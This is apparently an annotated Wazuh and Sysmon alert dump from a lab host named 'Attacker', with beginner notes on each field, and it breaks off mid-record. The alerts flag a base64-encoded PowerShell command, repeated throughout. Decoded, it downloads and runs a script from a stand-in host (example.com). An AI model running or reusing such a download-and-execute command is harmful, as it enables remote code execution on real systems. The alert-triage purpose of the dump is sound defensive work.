data.win.eventdata.parentProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 57 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534254.1431216 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:31.7121992Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283853 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:31.699
ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00}
ProcessId: 10656
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pl3lg5tj.szw.ps1
CreationUtcTime: 2025-04-24 22:37:31.699
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:31.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2a-680a-490b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10656 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pl3lg5tj.szw.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:31.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 54 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534256.1433985 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:34.5897282Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283901 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:33.020
ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00}
ProcessId: 13716
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00}
ParentProcessId: 10656
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:33.020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10656 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 58 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534256.1442056 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:34.8542189Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283902 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:34.803
ProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00}
ProcessId: 13716
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awdjgktt.o0r.ps1
CreationUtcTime: 2025-04-24 22:37:34.803
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:34.803 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awdjgktt.o0r.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:34.803 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 55 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534260.1444825 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:37.7599742Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283927 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:36.286
ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00}
ProcessId: 5012
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00}
ParentProcessId: 13716
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:36.286 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd30-680a-4e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd2d-680a-4c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 59 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534260.1452892 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:37.9972832Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283932 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:37.993
ProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00}
ProcessId: 5012
